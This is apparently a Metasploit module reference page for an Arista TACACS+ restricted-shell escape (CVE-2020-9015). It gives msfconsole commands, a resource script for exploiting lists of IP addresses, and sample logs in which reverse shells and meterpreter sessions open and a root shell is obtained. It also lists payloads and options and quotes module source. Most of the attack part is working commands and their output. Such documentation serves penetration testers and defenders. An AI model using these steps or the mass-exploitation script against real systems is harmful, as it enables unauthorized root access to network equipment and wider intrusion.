Arista restricted shell escape (with privesc) - Metasploit
This page contains detailed information about how to use the exploit/unix/ssh/arista_tacplus_shell metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Arista restricted shell escape (with privesc)
Module: exploit/unix/ssh/arista_tacplus_shell
Source code: modules/exploits/unix/ssh/arista_tacplus_shell.rb
Disclosure date: 2020-02-02
Last modification time: 2022-04-19 22:38:50 +0000
Supported architecture(s): x86
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): 22
List of CVEs: CVE-2020-9015
This exploit module takes advantage of a poorly configured TACACS+ config, Arista's bash shell and TACACS+ read-only account to privilage escalate. A CVSS v3 base score of 9.8 has been assigned.
Module Ranking and Traits
Module Ranking:
- great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
Using arista_tacplus_shell against a single host
Normally, you can use exploit/unix/ssh/arista_tacplus_shell this way:
msf > use exploit/unix/ssh/arista_tacplus_shell
msf exploit(arista_tacplus_shell) > show targets
... a list of targets ...
msf exploit(arista_tacplus_shell) > set TARGET target-id
msf exploit(arista_tacplus_shell) > show options
... show and set options ...
msf exploit(arista_tacplus_shell) > exploit
Using arista_tacplus_shell against multiple hosts
But it looks like this is a remote exploit module, which means you can also engage multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your arista_tacplus_shell will be using:
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD [payload]
- Set other options required by the payload
- Do:
set EXITONSESSION false
- Do:
run -j
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
print_status("Trying against #{ip}")
run_single("use exploit/unix/ssh/arista_tacplus_shell")
run_single("set RHOST #{ip}")
run_single("set DisablePayloadHandler true")
#
# Set a payload that's the same as the handler.
# You might also need to add more run_single commands to configure other
# payload options.
#
run_single("set PAYLOAD [payload name]")
run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Description
Implementing TACACS+ with Arista switch versions equal to or before 4.23.1F for "Read-Only" users can circumvent using the built-in roles supplied to restrict any bash commands, leading to privilege escalation. This exploit is a combination of a poorly configured TACACS+ (tac_plus) AAA server and Arista’s alternative CLI shells.
Vulnerable Application
This module has been tested successfully on:
- tac_plus Version: 202001211926/PCRE/DES
Additional Vulnerable Tested Hardware/Software Combinations:
- DCS-7280SRAM-48C6-R – 4.22.0.1F
- DCS-7050CX3-32S-R – 4.20.11M
- DCS-7050QX-32S-R – 4.20.9M
Verification Steps
- Start
msfconsole
use exploit/unix/arista_tacplus_shell
set PASSWORD <password>
set USERNAME <username>
set LHOST <lhost>
set RHOST <rhost>
check
run
- You should get a root session
Scenario
root@kali:~/git/metasploit-framework# ./msfconsole
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v5.0.92-dev-5ef76ff232 ]
+ -- --=[ 2025 exploits - 1101 auxiliary - 343 post ]
+ -- --=[ 566 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Display the Framework log using the log command, learn more with help log
msf5 > search arista
Matching Modulesf
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ssh/arista_tacplus_shell 2020-02-02 great Yes Arista restricted shell escape (with privesc)
msf5 > use 0
msf5 exploit(unix/ssh/arista_tacplus_shell) > show options
Module options (exploit/unix/ssh/arista_tacplus_shell):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Password to login with
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 22 yes The target port
USERNAME yes Username to login with
Payload options (linux/x86/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Universal
msf5 exploit(unix/ssh/arista_tacplus_shell) > set LHOST eth0
LHOST => 10.10.10.20
msf5 exploit(unix/ssh/arista_tacplus_shell) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf5 exploit(unix/ssh/arista_tacplus_shell) > set USERNAME admin
USERNAME => admin
msf5 exploit(unix/ssh/arista_tacplus_shell) > set PASSWORD admin
PASSWORD => admin
msf5 exploit(unix/ssh/arista_tacplus_shell) > check
[+] 10.10.10.10:22 - The target is vulnerable.
msf5 exploit(unix/ssh/arista_tacplus_shell) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.10.20:4444
[*] 10.10.10.10:22 - Attempt to login to the Arista's restricted shell...
msf5 exploit(unix/ssh/arista_tacplus_shell) > [+] SSH connection established.
[*] Requesting pty rbash
[+] Pty successfully obtained.
[*] Requesting a shell.
[+] Spawned into arista rbash shell.
[*] Attempting to break out of Arista rbash...
[+] Escaped from rbash!
[*] Command shell session 1 opened (10.01.10.20:4444 -> 10.10.10.10:51153) at 2020-06-09 15:39:53 -0700
msf5 exploit(unix/ssh/arista_tacplus_shell) > sessions -i 1
[*] Starting interaction with 1...
bash-4.3# whoami
whoami
root
bash-4.3# exit
exit
exit
[*] 10.10.10.10 - Command shell session 1 closed.
msf5 exploit(unix/ssh/arista_tacplus_shell) >
Go back to menu.
Msfconsole Usage
Here is how the unix/ssh/arista_tacplus_shell exploit module looks in the msfconsole:
msf6 > use exploit/unix/ssh/arista_tacplus_shell
[*] Using configured payload linux/x86/shell_reverse_tcp
msf6 exploit(unix/ssh/arista_tacplus_shell) > show info
Name: Arista restricted shell escape (with privesc)
Module: exploit/unix/ssh/arista_tacplus_shell
Platform: Linux
Arch: x86
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2020-02-02
Provided by:
Chris Anders
Available targets:
Id Name
-- ----
0 Universal
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Password to login with
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
USERNAME yes Username to login with
Payload information:
Description:
This exploit module takes advantage of a poorly configured TACACS+
config, Arista's bash shell and TACACS+ read-only account to
privilage escalate. A CVSS v3 base score of 9.8 has been assigned.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-9015
http://www.securitybytes.me/posts/cve-2020-9015/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9015
https://nvd.nist.gov/vuln/detail/CVE-2020-9015
Module Options
This is a complete list of options available in the unix/ssh/arista_tacplus_shell exploit:
msf6 exploit(unix/ssh/arista_tacplus_shell) > show options
Module options (exploit/unix/ssh/arista_tacplus_shell):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Password to login with
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
USERNAME yes Username to login with
Payload options (linux/x86/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Universal
Advanced Options
Here is a complete list of advanced options supported by the unix/ssh/arista_tacplus_shell exploit:
msf6 exploit(unix/ssh/arista_tacplus_shell) > show advanced
Module advanced options (exploit/unix/ssh/arista_tacplus_shell):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
GatherProof false yes Gather proof of access via pre-session shell commands
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSH_DEBUG false no Enable SSH debugging output (Extreme verbosity!)
SSH_IDENT SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 yes SSH client identification string
SSH_TIMEOUT 30 no Specify the maximum time to negotiate a SSH session
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (linux/x86/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugLevel 0 yes Set debug level for meterpreter 0-3 (Default output is strerr)
PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root)
PrependFork false no Prepend a stub that starts the payload in its own process via fork
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
RemoteMeterpreterDebugFile no Redirect Debug Info to a Log File
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the unix/ssh/arista_tacplus_shell module can exploit:
msf6 exploit(unix/ssh/arista_tacplus_shell) > show targets
Exploit targets:
Id Name
-- ----
0 Universal
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the unix/ssh/arista_tacplus_shell exploit:
msf6 exploit(unix/ssh/arista_tacplus_shell) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/debug_trap normal No Generic x86 Debug Trap
2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 payload/generic/tight_loop normal No Generic x86 Tight Loop
5 payload/linux/x86/adduser normal No Linux Add User
6 payload/linux/x86/chmod normal No Linux Chmod
7 payload/linux/x86/exec normal No Linux Execute Command
8 payload/linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
9 payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
10 payload/linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager
11 payload/linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86)
12 payload/linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
13 payload/linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6)
14 payload/linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager
15 payload/linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager
16 payload/linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager
17 payload/linux/x86/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
18 payload/linux/x86/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
19 payload/linux/x86/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
20 payload/linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP
21 payload/linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline
22 payload/linux/x86/read_file normal No Linux Read File
23 payload/linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
24 payload/linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
25 payload/linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager
26 payload/linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86)
27 payload/linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
28 payload/linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6)
29 payload/linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager
30 payload/linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
31 payload/linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager
32 payload/linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6)
33 payload/linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
34 payload/linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
35 payload/linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
36 payload/linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6)
Evasion Options
Here is the full list of possible evasion options supported by the unix/ssh/arista_tacplus_shell exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(unix/ssh/arista_tacplus_shell) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- <RHOST>:<RPORT> SSH - Connection error or address in use
- <RHOST>:<RPORT> SSH - Disconnected during negotiation
- <RHOST>:<RPORT> SSH - Timed out during negotiation
- <RHOST>:<RPORT> SSH - Failed authentication
- <RHOST>:<RPORT> SSH Error: <E.CLASS> : <E.MESSAGE>
- <RHOST>:<RPORT> SSH session couldn't be established
- <RHOST>:<RPORT> Could not request a PTY!
- <RHOST>:<RPORT> Could not open rbash shell!
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<RHOST>:<RPORT> SSH - Connection error or address in use
Here is a relevant code snippet related to the "<RHOST>:<RPORT> SSH - Connection error or address in use" error message:
140: ssh = nil
141: ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
142: ssh = Net::SSH.start(rhost, username, opts)
143: end
144: rescue Rex::ConnectionError
145: fail_with(Failure::Unreachable, "#{rhost}:#{rport} SSH - Connection error or address in use")
146: rescue Net::SSH::Disconnect, ::EOFError
147: fail_with(Failure::Disconnected, "#{rhost}:#{rport} SSH - Disconnected during negotiation")
148: rescue ::Timeout::Error
149: fail_with(Failure::TimeoutExpired, "#{rhost}:#{rport} SSH - Timed out during negotiation")
150: rescue Net::SSH::AuthenticationFailed
<RHOST>:<RPORT> SSH - Disconnected during negotiation
Here is a relevant code snippet related to the "<RHOST>:<RPORT> SSH - Disconnected during negotiation" error message:
142: ssh = Net::SSH.start(rhost, username, opts)
143: end
144: rescue Rex::ConnectionError
145: fail_with(Failure::Unreachable, "#{rhost}:#{rport} SSH - Connection error or address in use")
146: rescue Net::SSH::Disconnect, ::EOFError
147: fail_with(Failure::Disconnected, "#{rhost}:#{rport} SSH - Disconnected during negotiation")
148: rescue ::Timeout::Error
149: fail_with(Failure::TimeoutExpired, "#{rhost}:#{rport} SSH - Timed out during negotiation")
150: rescue Net::SSH::AuthenticationFailed
151: fail_with(Failure::NoAccess, "#{rhost}:#{rport} SSH - Failed authentication")
152: rescue Net::SSH::Exception => e
<RHOST>:<RPORT> SSH - Timed out during negotiation
Here is a relevant code snippet related to the "<RHOST>:<RPORT> SSH - Timed out during negotiation" error message:
144: rescue Rex::ConnectionError
145: fail_with(Failure::Unreachable, "#{rhost}:#{rport} SSH - Connection error or address in use")
146: rescue Net::SSH::Disconnect, ::EOFError
147: fail_with(Failure::Disconnected, "#{rhost}:#{rport} SSH - Disconnected during negotiation")
148: rescue ::Timeout::Error
149: fail_with(Failure::TimeoutExpired, "#{rhost}:#{rport} SSH - Timed out during negotiation")
150: rescue Net::SSH::AuthenticationFailed
151: fail_with(Failure::NoAccess, "#{rhost}:#{rport} SSH - Failed authentication")
152: rescue Net::SSH::Exception => e
153: fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}")
154: end
<RHOST>:<RPORT> SSH - Failed authentication
Here is a relevant code snippet related to the "<RHOST>:<RPORT> SSH - Failed authentication" error message:
146: rescue Net::SSH::Disconnect, ::EOFError
147: fail_with(Failure::Disconnected, "#{rhost}:#{rport} SSH - Disconnected during negotiation")
148: rescue ::Timeout::Error
149: fail_with(Failure::TimeoutExpired, "#{rhost}:#{rport} SSH - Timed out during negotiation")
150: rescue Net::SSH::AuthenticationFailed
151: fail_with(Failure::NoAccess, "#{rhost}:#{rport} SSH - Failed authentication")
152: rescue Net::SSH::Exception => e
153: fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}")
154: end
155:
156: fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH session couldn't be established") unless ssh
<RHOST>:<RPORT> SSH Error: <E.CLASS> : <E.MESSAGE>
Here is a relevant code snippet related to the "<RHOST>:<RPORT> SSH Error: <E.CLASS> : <E.MESSAGE>" error message:
148: rescue ::Timeout::Error
149: fail_with(Failure::TimeoutExpired, "#{rhost}:#{rport} SSH - Timed out during negotiation")
150: rescue Net::SSH::AuthenticationFailed
151: fail_with(Failure::NoAccess, "#{rhost}:#{rport} SSH - Failed authentication")
152: rescue Net::SSH::Exception => e
153: fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}")
154: end
155:
156: fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH session couldn't be established") unless ssh
157: begin
158: payload_executed = false
<RHOST>:<RPORT> SSH session couldn't be established
Here is a relevant code snippet related to the "<RHOST>:<RPORT> SSH session couldn't be established" error message:
151: fail_with(Failure::NoAccess, "#{rhost}:#{rport} SSH - Failed authentication")
152: rescue Net::SSH::Exception => e
153: fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}")
154: end
155:
156: fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH session couldn't be established") unless ssh
157: begin
158: payload_executed = false
159: print_good('SSH connection established.')
160:
161: ssh.open_channel do |channel, _data|
<RHOST>:<RPORT> Could not request a PTY!
Here is a relevant code snippet related to the "<RHOST>:<RPORT> Could not request a PTY!" error message:
160:
161: ssh.open_channel do |channel, _data|
162: print_status('Requesting pty rbash')
163:
164: channel.request_pty do |ch, success|
165: fail_with(Failure::Unreachable, "#{rhost}:#{rport} Could not request a PTY!") unless success
166: print_good('PTY successfully obtained.')
167:
168: print_status('Requesting a shell.')
169: ch.send_channel_request('shell') do |cha, _succ|
170: fail_with(Failure::Unreachable, "#{rhost}:#{rport} Could not open rbash shell!") unless success
<RHOST>:<RPORT> Could not open rbash shell!
Here is a relevant code snippet related to the "<RHOST>:<RPORT> Could not open rbash shell!" error message:
165: fail_with(Failure::Unreachable, "#{rhost}:#{rport} Could not request a PTY!") unless success
166: print_good('PTY successfully obtained.')
167:
168: print_status('Requesting a shell.')
169: ch.send_channel_request('shell') do |cha, _succ|
170: fail_with(Failure::Unreachable, "#{rhost}:#{rport} Could not open rbash shell!") unless success
171: print_good('Spawned into arista rbash shell.')
172:
173: cha.on_data do |_xx, data2|
174: if data2.include?('#') && !payload_executed
175: print_status('Attempting to break out of Arista rbash...')
Go back to menu.
Related Pull Requests
- #15192 Merged Pull Request: Enforce Style/RedundantBegin for new modules
- #14806 Merged Pull Request: Rubocop recently landed modules continued
- #14734 Merged Pull Request: Rubocop recently landed modules
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #13303 Merged Pull Request: Add CVE-2020-9015 Arista TACACS+ SSH Shell Escape
References
- CVE-2020-9015
- http://www.securitybytes.me/posts/cve-2020-9015/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9015
- https://nvd.nist.gov/vuln/detail/CVE-2020-9015
See Also
Check also the following modules related to this module:
- exploit/unix/ssh/array_vxag_vapv_privkey_privesc
- exploit/unix/ssh/tectia_passwd_changereq
- auxiliary/admin/networking/arista_config
- exploit/linux/http/dreambox_openpli_shell
- exploit/unix/http/epmp1000_get_chart_cmd_shell
- exploit/unix/http/epmp1000_ping_cmd_shell
- exploit/apple_ios/ssh/cydia_default_ssh
- exploit/linux/ssh/ceragon_fibeair_known_privkey
- exploit/linux/ssh/cisco_ucs_scpuser
- exploit/linux/ssh/exagrid_known_privkey
- exploit/linux/ssh/f5_bigip_known_privkey
- exploit/linux/ssh/ibm_drm_a3user
- exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey
- exploit/linux/ssh/mercurial_ssh_exec
- exploit/linux/ssh/microfocus_obr_shrboadmin
- exploit/linux/ssh/quantum_dxi_known_privkey
- exploit/linux/ssh/quantum_vmpro_backdoor
- exploit/linux/ssh/solarwinds_lem_exec
- exploit/linux/ssh/symantec_smg_ssh
- exploit/linux/ssh/vmware_vdp_known_privkey
- exploit/linux/ssh/vyos_restricted_shell_privesc
- exploit/multi/ssh/sshexec
- exploit/solaris/ssh/pam_username_bof
- exploit/windows/ssh/freeftpd_key_exchange
- exploit/windows/ssh/freesshd_authbypass
- exploit/windows/ssh/freesshd_key_exchange
- exploit/windows/ssh/putty_msg_debug
- exploit/windows/ssh/securecrt_ssh1
- exploit/windows/ssh/sysax_ssh_username
- exploit/unix/http/pfsense_diag_routes_webshell
- exploit/unix/http/pfsense_pfblockerng_webshell
- exploit/unix/webapp/wp_admin_shell_upload
- exploit/unix/webapp/wp_symposium_shell_upload
- exploit/unix/webapp/zeroshell_exec
Authors
- Chris Anders
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.